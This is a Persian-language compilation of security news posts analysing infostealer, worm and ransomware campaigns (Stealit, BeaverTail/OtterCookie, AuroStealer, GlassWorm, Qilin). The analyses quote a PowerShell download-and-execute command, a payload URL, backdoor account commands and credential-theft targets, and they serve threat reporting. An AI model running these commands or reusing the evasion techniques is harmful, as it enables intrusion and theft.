✅#Stealit

تحلیل کمپین بدافزار جدید Stealit
و بهره‌برداری از قابلیت Node.js SEA برای پنهان‌سازی و گسترش

محققان FortiGuard به تازگی یک کمپین فعال و جدید از بدافزار سرقت اطلاعات Stealit را شناسایی کرده است که از یک تکنیک نوآورانه برای توزیع و اجرای payloadهای خود بهره می‌برد. این کمپین با استفاده از قابلیت آزمایشی Single Executable Application (SEA) در Node.js، اسکریپت‌های مخرب خود را به صورت یک فایل اجرایی مستقل بسته‌بندی می‌کند. این رویکرد به بدافزار اجازه می‌دهد تا بدون نیاز به پیش‌نصب بودن Node.js روی سیستم قربانی، اجرا شود و در نتیجه شناسایی آن را دشوارتر می‌سازد.

در ادامه، تحلیل فنی دقیقی از این کمپین، از مکانیزم توزیع تا اجزای اصلی و تکنیک‌های فرار از تحلیل آن ارائه می‌شود.

زنجیره آلودگی و توزیع

بدافزار Stealit ، همانند نسخه‌های پیشین، خود را در قالب نصب‌کننده‌های نرم‌افزارهای قانونی مانند بازی‌ها و برنامه‌های VPN مخفی می‌کند. این فایل‌های آلوده از طریق پلتفرم‌های اشتراک‌گذاری فایل نظیر Mediafire و Discord توزیع می‌شوند. مهاجمان برای پیچیده‌تر کردن فرآیند تحلیل، این نصب‌کننده‌ها را با ابزارهایی مانند PyInstaller بسته‌بندی کرده یا در آرشیوهای فشرده قرار می‌دهند.

جالب توجه است که وب‌سایت پنل کنترل و فرماندهی (C2) این بدافزار نیز به دامنه‌های جدیدی منتقل شده است. این وب‌سایت، Stealit را به عنوان یک "راه‌حل حرفه‌ای استخراج داده" با طرح‌های اشتراک مختلف برای سیستم‌عامل‌های ویندوز و اندروید تبلیغ می‌کند و حتی یک کانال تلگرامی برای جذب مشتریان بالقوه دارد.

تحلیل فنی نصب‌کننده (Installer)

فرآیند نصب بدافزار چند لایه و بسیار پیچیده است و در تمام مراحل از obfuscation سنگین برای جلوگیری از تحلیل کد استفاده می‌شود.

#**لایه اول: بهره‌برداری از Node.js SEA**

فایل اجرایی اولیه یک بسته Node.js SEA است. این قابلیت آزمایشی، تمام اسکریپت‌ها و وابستگی‌های لازم را در یک فایل باینری واحد جمع‌آوری می‌کند. اسکریپت مخرب اصلی در بخشی از منابع فایل اجرایی به نام NODE_SEA_BLOB ذخیره شده است. بررسی متادیتای این بخش نشان می‌دهد که این بسته با استفاده از یک پروژه متن‌باز به نام AngaBlue ساخته شده که فرآیند ایجاد فایل‌های اجرایی SEA را خودکار می‌کند.

#**لایه‌های دوم و سوم: اجرای درون حافظه**

اسکریپت لایه اول پس از اجرا، یک blob بزرگ و رمزنگاری‌شده را از داخل خود استخراج، رمزگشایی و با استفاده از تابع require در Node.js مستقیماً در حافظه اجرا می‌کند. این اسکریپت لایه دوم نیز به نوبه خود، اسکریپت لایه سوم را که باز هم به شدت مبهم‌سازی شده، در حافظه اجرا می‌کند. این تکنیک زنجیره‌ای اجرای درون حافظه، تحلیل مبتنی بر فایل را بسیار دشوار می‌سازد.

تکنیک‌های ضد تحلیل (Anti-Analysis)

اسکریپت لایه سوم، پیش از نصب اجزای اصلی، مجموعه‌ای گسترده از بررسی‌ها را برای تشخیص محیط‌های تحلیل و ماشین‌های مجازی انجام می‌دهد. این بررسی‌ها شامل موارد زیر است:

* تشخیص محیط مجازی: حداقل حافظه سیستم (2GB)، تعداد هسته‌های پردازنده (حداقل 2)، و بررسی نام کاربری و نام میزبان در برابر لیست سیاه کلمات کلیدی (مانند vmware , sandbox , analyst , test ).

* بررسی فایل‌ها و مسیرهای مشکوک: جستجو برای فایل‌ها و درایورهای مرتبط با VMware و VirtualBox.

* تحلیل زمانی (Timing Analysis): اندازه‌گیری زمان اجرای عملیات ریاضی برای تشخیص کندی ناشی از دیباگرها.

* شناسایی فرآیندهای پیشرفته: اجرای دستور wmic برای لیست کردن تمام فرآیندها و جستجو برای نام ابزارهای تحلیل رایج (مانند wireshark , x64dbg , IDA , Ghidra , Process Monitor ) یا آرگومان‌های مرتبط با دیباگ.

* بررسی پورت‌های شبکه: اجرای netstat –an برای یافتن پورت‌های فعال که در لیست سیاه قرار دارند.

* تحلیل رجیستری: بررسی کلیدهای رجیستری مرتبط با دیباگرها.

* تشخیص تزریق DLL: بررسی DLLهای بارگذاری‌شده در فرآیند بدافزار برای یافتن موارد مرتبط با ابزارهای تحلیل.

* بررسی فرآیند والد (Parent Process): چک کردن فرآیند والد برای اطمینان از اینکه خود توسط یک ابزار تحلیل اجرا نشده باشد.

اگر هر یک از این بررسی‌ها نشان دهد که بدافزار در حال تحلیل است، با نمایش یک پیام خطا، اجرای خود را متوقف می‌کند.

نصب و ماندگاری اجزای اصلی

پس از عبور موفقیت‌آمیز از بررسی‌های ضد تحلیل، نصب‌کننده سه کامپوننت اصلی را از سرور C2 دانلود می‌کند: save_data.exe , stats_db.exe و game_cache.exe .

این فایل‌ها در یک مسیر تصادفی در AppData\Local ذخیره می‌شوند و برای جلوگیری از اسکن توسط Windows Defender، مسیر دایرکتوری ایجاد شده با استفاده از یک دستور PowerShell به لیست استثنائات (Exclusion list) آن اضافه می‌شود.

✅#SEAL

دانشگاه MIT یک هوش مصنوعی ساخته که می‌تونه کد خودش رو بازنویسی کنه تا باهوش‌تر بشه.

بهش میگن SEAL (مدل‌های زبانی خود-تطبیق‌پذیر) .

به جای اینکه انسان‌ها تنظیمش کنن، SEAL اطلاعات جدید رو خونده، اونا رو با کلمات خودش بازنویسی می‌کنه و به‌روزرسانی‌های گرادیان رو روی خودش اجرا می‌کنه و به معنای واقعی کلمه یادگیری خودراهبر داره.

و ما تازه وارد عصر مدل‌های خود-تکاملی شدیم.

✅#Satellites

پژوهشگران دو دانشگاه مطرح آمریکا‌ بمدت سه سال یک آنتن نه چندان پیچیده رو به سمت آسمان گرفتند و به داده‌ هاییکه بین ایستگاهای زمینی و ماهواره ها مبادله می‌شد گوش دادند. نتیجه تحقیق تکان‌دهنده هست!

اونها موفق به ضبط هزاران گفت‌وگوی صوتی و پیام کوتاه رمزنگاری نشده رو از کاربران یک شبکهٔ تلفن همراه شدند. همچنین ارتباطات برخی از نهادهای نظامی و اطلاعاتی در بین داده های ثبت شده وجود داشت که از اهمیت بالایی برخوردارند. این پژوهش نشون میده که نزدیک به نیمی از پیام‌های ماهواره‌ای در مدار ثابت زمین بدون هیچ گونه رمزنگاری مبادله می‌شوند. یعنی سیلی از داده‌های بسیار حساس از فراز زمین عبور میکنند و هر کس با یک ابزار ساده و هزینه ای کمتر از ۸۰۰ دلار قادر به دریافت انهاست.

✅#Rootkit

تحلیلی عمیق بر یک روت‌کیت پیشرفته و پنهان‌کار هسته لینوکس

Singularity - Powerful Linux Kernel Rootkit

✅#North_Korean_Hackers

تحلیل یک حمله:
ترکیب BeaverTail و OtterCookie با ماژول جدید Keylogging

گروه (APT) Famous Chollima ، که زیرمجموعه‌ای از گروه بزرگ‌تر Lazarus و همسو با منافع اقتصادی کره شمالی (DPRK) است، بار دیگر با تکامل ابزارهای خود، جامعه توسعه‌دهندگان و جویندگان کار در حوزه فناوری را هدف قرار داده است. در جدیدترین کمپین کشف‌شده ، این گروه با ترکیب دو بدافزار مجزای پیشین، BeaverTail و OtterCookie ، و افزودن یک ماژول جدید مبتنی بر جاوا اسکریپت برای Keylogging و (Screenshotting) ، یک ابزار سرقت اطلاعات یکپارچه و قدرتمند ایجاد کرده است.

بررسی اجمالی کمپین و تاکتیک‌ها

- هدف: سرقت اطلاعات حساس، به ویژه ارزهای دیجیتال و اطلاعات اعتباری (credentials).

- قربانیان: عمدتاً جویندگان کار و توسعه‌دهندگان نرم‌افزار.

- روش مهندسی اجتماعی: مهاجمان با جعل هویت سازمان‌های استخدامی و ارائه پیشنهادات شغلی جعلی، قربانیان را فریب می‌دهند تا یک اپلیکیشن آلوده را به عنوان بخشی از فرآیند مصاحبه یا آزمون فنی نصب کنند.

- نمونه موردی: در این حمله، یک سازمان در سریلانکا به صورت غیرمستقیم مورد هدف قرار گرفت. یکی از کارمندان این سازمان، فریب یک پیشنهاد شغلی جعلی را خورده و یک اپلیکیشن تروجانایز شده مبتنی بر Node.js به نام "Chessfi" را نصب کرده است. این اپلیکیشن که ظاهراً یک پلتفرم شطرنج مبتنی بر وب ۳ برای شرط‌بندی با ارز دیجیتال است، به عنوان طعمه‌ای ایده‌آل برای جذب اهداف علاقه‌مند به این حوزه عمل می‌کند.

زنجیره آلودگی: یک فرآیند چندمرحله‌ای و پنهان‌کارانه

مهاجمان برای پنهان کردن فعالیت مخرب خود از یک زنجیره آلودگی پیچیده استفاده می‌کنند که تشخیص آن برای یک توسعه‌دهنده معمولی دشوار است:

1. کلون کردن پروژه: قربانی از طریق پلتفرم‌هایی مانند Fiverr یا Discord ترغیب می‌شود تا یک پروژه نرم‌افزاری را از یک مخزن Git (در این مورد، Bitbucket) کلون کند.

2. نصب وابستگی‌ها: طبق دستورالعمل‌های موجود در فایل README.md ، قربانی دستور npm install را برای نصب پکیج‌های مورد نیاز پروژه اجرا می‌کند.

3. اجرای پکیج مخرب: در میان وابستگی‌ها، یک پکیج مخرب به نام node-nvm-ssh که در مخزن رسمی NPM منتشر شده، دانلود و نصب می‌شود.

4. اسکریپت postinstall: فایل package.json این پکیج مخرب حاوی یک اسکریپت postinstall است. این اسکریپت به گونه‌ای طراحی شده که پس از اتمام نصب به طور خودکار اجرا شود. این اسکریپت، دستورات دیگری را فراخوانی می‌کند که در نهایت به اجرای یک فایل جاوا اسکریپت منجر می‌شود.

5. ایجاد فرآیند فرزند (Child Process): یک اسکریپت میانی (index.js) یک فرآیند فرزند جدا شده (detached child process) را ایجاد می‌کند تا اسکریپت مخرب بعدی (file15.js) را اجرا کند. این کار به بدافزار اجازه می‌دهد حتی پس از بسته شدن ترمینال اصلی، به اجرای خود ادامه دهد.

6. بارگذاری پیلود نهایی: اسکریپت file15.js محتویات یک فایل به نام test.list را می‌خواند و با استفاده از تابع eval() آن را اجرا می‌کند. این فایل حاوی پیلود نهایی است؛ یک کد جاوا اسکریپت بسیار بزرگ و مبهم‌سازی شده (Obfuscated) که ترکیبی از BeaverTail و OtterCookie است.

تکامل بدافزار: ادغام BeaverTail و OtterCookie

تا پیش از این، BeaverTail و OtterCookie به عنوان دو ابزار مجزا اما مکمل عمل می‌کردند. اما در این کمپین، کارکردهای آن‌ها در یک پیلود واحد ادغام شده است.

#**قابلیت‌های به ارث برده از BeaverTail:

- **شمارش پروفایل‌ها و افزونه‌های مرورگر: جستجو برای پروفایل‌های مرورگرهای مختلف و افزونه‌های نصب‌شده، به ویژه افزونه‌های مرتبط با کیف پول‌های ارز دیجیتال.

- دانلود پیلود ثانویه: قابلیت دانلود و اجرای ماژول‌های پایتونی مانند InvisibleFerret (یک ابزار سرقت اطلاعات) از سرور فرماندهی و کنترل (C2).

- نصب ابزار دسترسی از راه دور: در نسخه‌های قدیمی‌تر، ابزارهایی مانند AnyDesk را برای کنترل کامل سیستم قربانی نصب می‌کرد.

#**قابلیت‌های OtterCookie و ماژول جدید آن (نسخه v5):

۔ OtterCookie از یک ابزار ساده برای بارگذاری کد از راه دور به یک بدافزار ماژولار و پیشرفته تبدیل شده است.

- **ماژول Remote Shell: با استفاده از پکیج socket.io-client یک ارتباط پایدار با سرور C2 برقرار کرده و به مهاجم اجازه می‌دهد دستورات را از راه دور روی سیستم قربانی اجرا کند.

- ماژول سرقت فایل: فایل سیستم را برای یافتن فایل‌های "جذاب" با الگوها و پسوندهای مشخص (مانند env , .metamask , .wallet , .pdf , .docx , .secret. , ... ) جستجو کرده و آن‌ها را به سرور C2 آپلود می‌کند.

✅#TikTok

هکرها با استفاده از ویدیوهای TikTok، بدافزار خود را نصب می‌کنند

این گزارش به تحلیل یک کمپین فعال مهندسی اجتماعی در پلتفرم TikTok می‌پردازد که کاربران را با وعده فعال‌سازی رایگان نرم‌افزارهای گران‌قیمت مانند Photoshop، فریب داده و به نصب بدافزار سارق اطلاعات (InfoStealer) به نام AuroStealer آلوده می‌کند. این تحلیل، زنجیره آلودگی (Kill Chain) و تکنیک‌های پیشرفته مورد استفاده مهاجمان را تشریح می‌کند.

مهاجمان از پلتفرم محبوب TikTok برای انتشار ویدئوهای فریبنده استفاده می‌کنند.

* طعمه : ارائه راهی آسان برای فعال‌سازی رایگان Adobe Photoshop.

* تکنیک: این حمله از یک تکنیک مهندسی اجتماعی مشابه ClickFix بهره می‌برد. در این روش، به جای ارسال یک فایل اجرایی، قربانی ترغیب می‌شود تا با دسترسی Administrator ، یک خط فرمان PowerShell را مستقیماً اجرا کند. این کار باعث می‌شود کاربر، خود، مکانیزم‌های امنیتی اولیه را دور بزند.

* فرمان مخرب:

iex (irm slmgr[.]win/photoshop)

۔* irm (Invoke-RestMethod): این cmdlet محتوا را از URL مشخص شده (slmgr[.]win/photoshop) دانلود می‌کند.

۔* iex (Invoke-Expression): این cmdlet خطرناک، محتوای دانلود شده (که یک اسکریپت پاورشل است) را مستقیماً در حافظه اجرا می‌کند. این یک تکنیک "fileless" (بدون فایل) است که از شناسایی مبتنی بر فایل توسط آنتی‌ویروس‌ها جلوگیری می‌کند.

## تحلیل زنجیره آلودگی (Kill Chain Analysis)

مرحله اول: اسکریپت پاورشل (Stager)

اسکریپت پاورشل دانلود شده از slmgr[.]win (با هش SHA256: 6D897B56...) به عنوان مرحله اول (Stager) عمل می‌کند و دو وظیفه اصلی دارد:

1. دانلود payload: دانلود مرحله بعدی بدافزار (updater.exe) از آدرس https://file-epq[.]pages[.]dev/updater.exe

2. ایجاد ماندگاری (Persistence):

* این اسکریپت یک Scheduled Task (وظیفه زمان‌بندی شده) ایجاد می‌کند تا بدافزار در هر بار لاگین کاربر اجرا شود (-Trigger (New-ScheduledTaskTrigger -AtLogOn)).

* تکنیک فرار از شناسایی (Evasion): برای جلوگیری از شناسایی و ترکیب شدن با وظایف سیستمی، اسکریپت به صورت تصادفی یکی از نام‌های موجه زیر را برای وظیفه خود انتخاب می‌کند:

* MicrosoftEdgeUpdateTaskMachineCore
* GoogleUpdateTaskMachineCore
* AdobeUpdateTask
* OfficeBackgroundTaskHandlerRegistration
* WindowsUpdateCheck

* این وظیفه با بالاترین سطح دسترسی (-RunLevel Highest) اجرا می‌شود، زیرا قربانی در ابتدا پاورشل را با دسترسی ادمین اجرا کرده است.

مرحله دوم: پی‌لود اصلی (AuroStealer)

* فایل updater.exe (با هش SHA256: 58b11b4d...) که توسط گزارش SANS به عنوان بدافزار AuroStealer (بر اساس Malpedia) شناسایی شده است.

۔* AuroStealer یک (InfoStealer) است که احتمالاً مبتنی بر .NET می‌باشد. این نوع بدافزارها به طور خاص برای سرقت اطلاعات حساس مانند کوکی‌های مرورگر، رمزهای عبور ذخیره شده، اطلاعات کارت‌های اعتباری و داده‌های مربوط به کیف پول‌های ارز دیجیتال طراحی شده‌اند.

مرحله سوم: پی‌لود ثانویه و تکنیک "خود-کامپایلی" (Self-Compiling)

* در نهایت، پی‌لود دومی به نام source.exe (با هش SHA256: db57e4a7...) دانلود و اجرا می‌شود.

* تکنیک پیشرفته (TTP): این بدافزار از یک تکنیک جالب برای فرار از شناسایی به نام "On-Demand Compilation" یا "Self-Compiling Malware" استفاده می‌کند.

1. بدافزار source.exe به جای حمل مستقیم کد مخرب نهایی، حاوی سورس کد C\# است.

2. سپس، کامپایلر قانونی و امضا شده مایکروسافت (csc.exe) را که بخشی از .NET Framework است، فراخوانی می‌کند:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline

3. این دستور، سورس کد موجود در فایل vpkwkdbo.cmdline را در لحظه بر روی سیستم قربانی کامپایل می‌کند.

* تحلیل کد C\# کامپایل شده: کد C\# کامپایل شده یک کلاس ساده به نام SC ایجاد می‌کند که یک Shellcode Injector کلاسیک است:

✅#7_zip

اکسپلویت برای 7zip

توضیحات بیشتر در مورد این آسیب پذیری

@NullError_ir

✅#DefenderWrite

ابزاری برای RedTeams

ﺳﺆاستفاده از لیست سفید آنتی‌ویروس برای انتشار بدافزار

✅#Ravin_Academy

💢خبر از پخش اسامی (شماره ملی - شماره تلفن - id تلگرامی) از موسسه آکادمی راوین به گوش می‌رسد.

✅#GlassWorm


بدافزار GlassWorm تهاجم با کد نامرئی و C2 مبتنی بر بلاک‌چین به OpenVSX

تحلیلگران امنیتی از شناسایی یک worm خود-تکثیر (Self-Propagating) جدید به نام GlassWorm خبر داده‌اند که به طور خاص افزونه‌های VS Code در مارکت‌پلیس OpenVSX را هدف قرار داده است. این حمله، که تنها یک ماه پس از شناسایی worm مشابهی به نام Shai Hulud در اکوسیستم npm رخ می‌دهد، نشان‌دهنده یک جهش قابل توجه در تکنیک‌های حملات زنجیره تأمین است.

این GlassWorm صرفاً یک حمله زنجیره تأمین دیگر نیست؛ این بدافزار از مجموعه‌ای از تکنیک‌های بسیار پیشرفته استفاده می‌کند که آن را در رده حملات سطح APT قرار می‌دهد:

1۔ کد نامرئی (Invisible Code): استفاده از کاراکترهای یونیکد (Unicode) غیرقابل چاپ برای پنهان‌سازی کامل کد مخرب از دید بازبین‌های انسانی و ابزارهای تحلیل استاتیک.

2۔ زیرساخت C2 مبتنی بر بلاک‌چین: استفاده از بلاک‌چین Solana به عنوان یک سرور C2 تغییرناپذیر و غیرقابل حذف (Immutable).

3۔ C2 پشتیبان: استفاده از Google Calendar به عنوان مکانیزم C2 ثانویه.

4۔ Payload نهایی: یک Remote Access Trojan (RAT) تمام‌عیار که ماشین‌های توسعه‌دهندگان را به نودهای پراکسی (Proxy Node) در یک زیرساخت مجرمانه تبدیل می‌کند.

در حال حاضر (بر اساس گزارش اولیه)، این حمله فعال است. هفت افزونه در OpenVSX و یک افزونه در مارکت‌پلیس رسمی VSCode مایکروسافت آلوده شناسایی شده‌اند که مجموعاً بیش از 35,800 بار دانلود شده‌اند.

تکنیک پنهان‌سازی کد با یونیکد

مشخصه GlassWorm تکنیک پنهان‌سازی آن است. مهاجمان کد مخرب را نه با obfuscation یا minification، بلکه با استفاده از کاراکترهای انتخابگر تنوع یونیکد (Unicode variation selectors) در سورس کد جاوا اسکریپت افزونه تزریق کرده‌اند.

این کاراکترها، در حالی که بخشی از استاندارد یونیکد هستند، هیچ خروجی بصری در اکثر ویرایشگرهای کد (IDEها) مانند VS Code یا در ابزارهای بازبینی کد مانند git diff ایجاد نمی‌کنند. در نتیجه، یک توسعه‌دهنده یا بازبین امنیتی، هنگام بررسی سورس کد، تنها چندین خط خالی یا فضای سفید مشاهده می‌کند، در حالی که مفسر جاوا اسکریپت این کاراکترها را به عنوان کد اجرایی معتبر شناسایی و اجرا می‌کند.

این تکنیک به طور کامل فرآیندهای سنتی Code Review انسانی و ابزارهای SAST (Static Analysis Security Testing) را که برای شناسایی چنین کاراکترهایی طراحی نشده‌اند، دور می‌زند.

زیرساخت C2 سه‌لایه و تخریب‌ناپذیر

پیچیدگی GlassWorm در زیرساخت Command and Control آن به اوج می‌رسد:

لایه ۱: C2 اولیه مبتنی بر بلاک‌چین Solana

بدافزار پس از اجرا، یک آدرس کیف پول (Wallet Address) هاردکد شده در بلاک‌چین Solana را جستجو می‌کند. سپس، تراکنش‌های مرتبط با این کیف پول را برای یافتن فیلد memo بررسی می‌کند.

مهاجمان URL دانلود payload مرحله بعد را در قالب یک آبجکت JSON (به صورت Base64-encoded) در فیلد memo یک تراکنش ثبت کرده‌اند.

چرا این تکنیک ویرانگر است؟

* تغییرناپذیری (Immutability): پس از ثبت تراکنش در بلاک‌چین، امکان حذف یا تغییر آن وجود ندارد. هیچ ارائه‌دهنده هاستینگ یا ثبت‌کننده‌ دامنه‌ای برای ارسال درخواست Takedown وجود ندارد.

* ناشناسی (Anonymity): کیف پول‌های کریپتو، ناشناسی بالایی را فراهم می‌کنند.

* مقاومت در برابر سانسور: زیرساخت غیرمتمرکز است و نمی‌توان آن را خاموش کرد.

* پویایی: مهاجم می‌تواند با ارسال یک تراکنش جدید (با هزینه‌ای کمتر از یک سنت)، آدرس IP یا دامنه payload سرور خود را به‌روزرسانی کند و تمام قربانیان به طور خودکار به آدرس جدید هدایت می‌شوند.

لایه ۲: C2 پشتیبان مبتنی بر Google Calendar

به عنوان یک مکانیزم پشتیبان هوشمندانه، بدافزار به یک رویداد Google Calendar عمومی دسترسی پیدا می‌کند. مهاجم URL دانلود payload (این بار با مسیر get_zombi_payload/) را به صورت Base64 در عنوان (Title) این رویداد تقویم ذخیره کرده است.

از آنجایی که ترافیک به دامنه‌های گوگل (calendar.app.google) کاملاً قانونی تلقی می‌شود، این ارتباط از دید اکثر ابزارهای امنیتی شبکه پنهان می‌ماند.

لایه ۳: تحویل Payload

پیلود مرحله بعد (که از آدرس به‌دست‌آمده از Solana یا Google Calendar دانلود می‌شود) با AES-256-CBC رمزنگاری شده است. نکته هوشمندانه اینجاست که کلید رمزگشایی (Decryption Key) در داخل payload نیست، بلکه در هدرهای سفارشی (Custom HTTP Headers) پاسخ سرور C2 ارسال می‌شود. این کار تحلیل خودکار ترافیک شبکه را دشوارتر می‌کند.

تحلیل Payload نهایی: ماژول "ZOMBI"

این Payload نهایی که "ZOMBI" نامگذاری شده است، یک RAT بسیار پیشرفته با قابلیت‌های زیر است که ماشین توسعه‌دهنده را به یک "سرباز زامبی" در بات‌نت مهاجم تبدیل می‌کند:

✅#Windows_Server

اکسپلویت آسیب پذیری در ویندوز سرور
این آسیب پذیری به مهاجمان اجازه می‌دهد تا کد دلخواه را با امتیازات سطح سیستم از طریق شبکه اجرا کنند و به‌طور بالقوه کل زیرساخت‌های فناوری اطلاعات را به خطر بیندازند .

ویندوز سرور ۲۰۱۲
ویندوز سرور ۲۰۱۲ R2
ویندوز سرور ۲۰۱۶
ویندوز سرور ۲۰۱۹
ویندوز سرور ۲۰۲۲
ویندوز سرور ۲۰۲۲، نسخه ۲۳H2
ویندوز سرور ۲۰۲۵

@NullError_ir

✅#Agenda


کشف یک کمپین باج‌افزاری پیچیده

باج‌افزار Agenda (Qilin)

این حمله نشان‌دهنده یک تاکتیک بسیار پیشرفته و نگران‌کننده است: استقرار و اجرای مستقیم یک باینری باج‌افزار مبتنی بر لینوکس بر روی سیستم‌های میزبان ویندوزی . این رویکرد اجرای بین-پلتفرمی (Cross-Platform Execution)، بسیاری از راه‌حل‌های امنیتی مرسوم متمرکز بر ویندوز، از جمله پلتفرم‌های EDR، را دور می‌زند.

نکات کلیدی و یافته‌های اصلی

* گروه عامل: Agenda (شناخته‌شده با نام Qilin)، یک عملیات باج‌افزار به عنوان سرویس (RaaS).

* تکنیک اصلی: اجرای باینری لینوکس بر روی ویندوز با سوءاستفاده از ابزارهای قانونی مدیریت از راه دور (RMM) و انتقال فایل.

۔ ابزارهای قانونی مورد سوءاستفاده:

۔ WinSCP: برای انتقال امن باینری لینوکس به میزبان ویندوزی.

۔ Splashtop Remote: برای اجرای مستقیم باینری لینوکس روی ویندوز.

۔ ATERA Networks (RMM): برای نصب AnyDesk.

۔ ScreenConnect: برای اجرای دستورات شناسایی.

* تاکتیک‌های فرار از دفاع: استفاده از حمله BYOVD (Bring Your Own Vulnerable Driver) برای خنثی‌سازی ابزارهای امنیتی (AV/EDR).

* هدف اصلی: زیرساخت‌های پشتیبان‌گیری Veeam برای سرقت سیستماتیک اعتبارنامه‌ها و حذف گزینه‌های بازیابی.

* قربانی‌شناسی: از ژانویه ۲۰۲۵، بیش از ۷۰۰ قربانی در ۶۲ کشور، با تمرکز بر بازارهای توسعه‌یافته (ایالات متحده، فرانسه، کانادا، بریتانیا) و صنایع با ارزش بالا (تولید، فناوری، خدمات مالی، مراقبت‌های بهداشتی).

زنجیره حمله (Attack Chain) به صورت دقیق

زنجیره حمله این گروه بسیار پیچیده و چند مرحله‌ای است و بر پنهان‌کاری از طریق ابزارهای قانونی (Living-off-the-Land) و تکنیک‌های پیشرفته فرار از دفاع متمرکز است.

# ۱. دسترسی اولیه (Initial Access)

* مهاجمان از طریق یک کمپین مهندسی اجتماعی پیچیده با استفاده از صفحات جعلی CAPTCHA که بر روی زیرساخت ذخیره‌سازی Cloudflare R2 میزبانی شده‌اند، نفوذ اولیه را به دست می‌آورند.

* این صفحات، کدهای جاوا اسکریپت مبهم‌سازی‌شده‌ای را اجرا می‌کنند که منجر به دانلود Information Stealer (سارق اطلاعات) بر روی سیستم قربانی می‌شود.

* این بدافزار، توکن‌های احراز هویت، کوکی‌های مرورگر و اعتبارنامه‌های ذخیره‌شده را برداشت می‌کند.

* داشتن این اعتبارنامه‌های معتبر به مهاجمان اجازه می‌دهد تا MFA (احراز هویت چندعاملی) را دور بزنند و با استفاده از نشست‌های (Sessions) کاربری قانونی، در شبکه حرکت جانبی کنند.

# ۲. ارتقای سطح دسترسی (Privilege Escalation)

* پس از نفوذ، مهاجمان یک SOCKS proxy DLL (مانند socks64.dll) را مستقر می‌کنند.

* این DLL مستقیماً با استفاده از فرآیند قانونی ویندوز (rundll32.exe socks64.dll,rundll) در حافظه بارگذاری می‌شود تا شناسایی آن دشوارتر گردد.

* یک حساب کاربری ادمین پشتیبان (Backdoor) با نامی موجه مانند "Supportt" ایجاد می‌شود (net user Supportt ... /add و net localgroup Administrators Supportt /add).

* همچنین رمز عبور حساب Administrator قانونی سیستم نیز تغییر داده می‌شود تا کنترل کامل حفظ گردد.

# ۳. شناسایی و نصب RMM (Discovery & RMM Installation)

* مهاجمان به طور گسترده از ابزارهای RMM قانونی برای شناسایی شبکه سوءاستفاده می‌کنند:

* با استفاده از ScreenConnect ، اسکریپت‌های فرمان موقتی را برای شمارش Domain Trusts ( nltest /domain_trusts ) و شناسایی ادمین‌های دامنه ( net group "domain admins" /domain ) اجرا می‌کنند.

* از ابزار NetScan برای اسکن جامع شبکه استفاده می‌کنند.

* آنها از ایجنت ATERA Networks برای نصب AnyDesk (نسخه ۹.۰.۵) بهره می‌برند.

* استفاده همزمان از ATERA، AnyDesk و ScreenConnect به آنها قابلیت‌های دسترسی از راه دور اضافی و قانونی (از دید سیستم‌های مانیتورینگ) می‌دهد.

# ۴. دسترسی به اعتبارنامه‌ها (Credential Access)

* این مرحله یکی از حیاتی‌ترین بخش‌های حمله است. مهاجمان به طور خاص زیرساخت پشتیبان‌گیری Veeam را هدف قرار می‌دهند.

* آنها اسکریپت‌های PowerShell با پی‌لودهای Base64-encoded را اجرا می‌کنند.

* این اسکریپت‌ها مستقیماً دیتابیس‌های SQL سرور Veeam را هدف قرار می‌دهند (مانند [VeeamBackup].[dbo].[Credentials]) تا اعتبارنامه‌های ذخیره‌شده را استخراج و رمزگشایی کنند.

* از این طریق، آنها به مجموعه‌ای جامع از اعتبارنامه‌های حساس، از جمله ادمین‌های دامنه، حساب‌های سرویس (svc-sql-*** , DOMAIN\veeam-svc-*** ) و ادمین‌های محلی سرورهای حیاتی (کنترلرهای دامنه، سرورهای Exchange ، پایگاه‌های داده) دست می‌یابند.